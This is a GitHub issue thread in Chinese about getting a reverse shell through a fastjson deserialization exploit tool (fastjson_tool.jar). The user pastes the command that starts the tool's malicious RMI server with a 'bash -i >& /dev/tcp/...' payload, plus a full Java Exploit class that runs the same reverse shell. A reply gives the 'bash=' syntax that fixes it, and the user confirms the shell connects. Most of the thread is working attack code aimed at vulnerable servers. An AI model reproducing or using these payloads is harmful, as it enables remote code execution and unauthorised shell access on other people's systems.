使用您的jar包无法在linux执行bash -i >&/dev/tcp/x.x.x.x/80 0>&1
zhzyker opened this issue · comments
当我启用RMI或者LDAP后:
java -cp fastjson_tool.jar fastjson.HRMIServer 1.1.1.1 8888 "bash -i >&/dev/tcp/x.x.x.x/80 0>&1"
RMI服务显示有请求,但是nc端没有连接。当我使用其他Payload时,可以进行反弹,例如:
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/x.x.x.x/80 0>&1"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
由于您的工具已经打成了jar我,我无法分析查看。故提此issuse
java -cp fastjson_tool.jar fastjson.HRMIServer 1.1.1.1 8888 "bash=bash -i >&/dev/tcp/x.x.x.x/80 0>&1" 试试
反弹shell一切正常,再次感谢作者